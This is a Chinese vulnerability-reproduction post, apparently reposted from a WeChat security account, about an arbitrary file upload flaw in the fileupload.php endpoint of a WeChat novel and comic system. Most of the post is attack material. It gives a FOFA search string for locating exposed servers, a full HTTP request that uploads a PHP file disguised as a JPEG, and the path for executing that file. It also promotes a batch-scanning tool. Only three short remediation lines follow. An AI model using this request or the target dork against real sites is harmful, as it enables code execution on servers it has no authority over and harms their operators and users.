微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞 PoC

admin 2024年10月31日11:17:14评论35 views字数 1209阅读4分1秒阅读模式
简介

微信公众号小说漫画系统集成了小说漫画的管理、发布和阅读功能,支持用户直接获取内容。系统内置丰富题材资源,满足多样阅读需求,增强用户黏性;支持作者入驻和作品上传,并提供微信小程序、H5网页、公众号和原生APP等多终端访问。

漏洞描述
微信公众号小说漫画系统在 fileupload.php 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器上执行任意代码,获取服务器权限。
fofa语法
body="/Public/home/mhjs/jquery.js"
漏洞复现
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzipUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryqvlfcogulumndzorContent-Length: 218------WebKitFormBoundaryqvlfcogulumndzorContent-Disposition: form-data; name="file"; filename="ert.php"Content-Type: image/jpeg<?php phpinfo();unlink(__FILE__);?>------WebKitFormBoundaryqvlfcogulumndzor
访问上传的ert.php文件https://IP/Public/webuploader/0.1.5/server/upload/ert.php

微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞 PoC

批量检测(批量检测POC工具请在公众号知识星球获取):

微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞 PoC

修复建议
1、禁⽌公⽹访问该系统;
2、设置访问接口权限;
3、及时升级到最新版本;

原文始发于微信公众号(白帽攻防):【漏洞复现】微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月31日11:17:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   微信公众号小说漫画系统 fileupload.php 任意文件上传漏洞 PoChttps://cn-sec.com/archives/3337214.html

发表评论

匿名网友 填写信息